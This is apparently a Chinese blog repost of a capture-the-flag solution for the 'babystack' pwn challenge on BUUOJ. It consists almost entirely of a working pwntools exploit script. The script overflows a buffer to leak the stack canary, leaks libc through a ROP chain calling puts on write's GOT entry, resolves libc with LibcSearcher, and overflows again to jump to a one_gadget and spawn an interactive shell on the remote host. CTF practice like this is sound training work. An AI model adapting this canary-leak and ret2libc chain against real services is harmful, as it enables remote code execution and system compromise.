others_babystack 左手的ㄟ右手 2023-02-28 01:53 2阅读 0赞 ![在这里插入图片描述][20200719133647315.png] ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzgzMzY0Mg_size_16_color_FFFFFF_t_70] exp from pwn import * from LibcSearcher import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() def store(content): p.sendlineafter('>> ', str(1)) p.send(content) def print(): p.sendlineafter('>> ', str(2)) def quit(): p.sendlineafter('>> ', str(3)) proc_name = './babystack' p = process(proc_name) p = remote('node3.buuoj.cn', 29422) elf = ELF(proc_name) write_got = elf.got['write'] puts_plt = elf.plt['puts'] store(b'a' * (0x90 - 0x8 + 0x1)) print() canary = u64(p.recv(0x90)[-8:]) - 0x61 log.info(hex(canary)) pop_rdi = 0x400a93 main_addr = 0x400908 payload = b'a' * (0x90 - 0x8) + p64(canary) + p64(0) + p64(pop_rdi) + p64(write_got) + p64(puts_plt) + p64(main_addr) store(payload) quit() write_addr = u64(p.recv().ljust(0x8, b'\x00')) # write_addr = u64(p.recv(0x33)[-6:].ljust(0x8, b'\x00')) log.info(hex(write_addr)) # debug_pause() libc = LibcSearcher('write', write_addr) libc_base = write_addr - libc.dump('write') one_gadget = libc_base + 0xf1147 payload1 = b'a' * (0x90 - 0x8) + p64(canary) + p64(0x0) + p64(one_gadget) store(payload1) quit() p.interactive() ![在这里插入图片描述][20200719172033417.png] [20200719133647315.png]: /images/20230209/c62f4ff4694e441b881baec34db04f7e.png [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzgzMzY0Mg_size_16_color_FFFFFF_t_70]: /images/20230209/3fec429aaab84550a9f23e2451f1ac48.png [20200719172033417.png]: /images/20230209/5a049f54b43741029b0df202ed00b338.png
还没有评论,来说两句吧...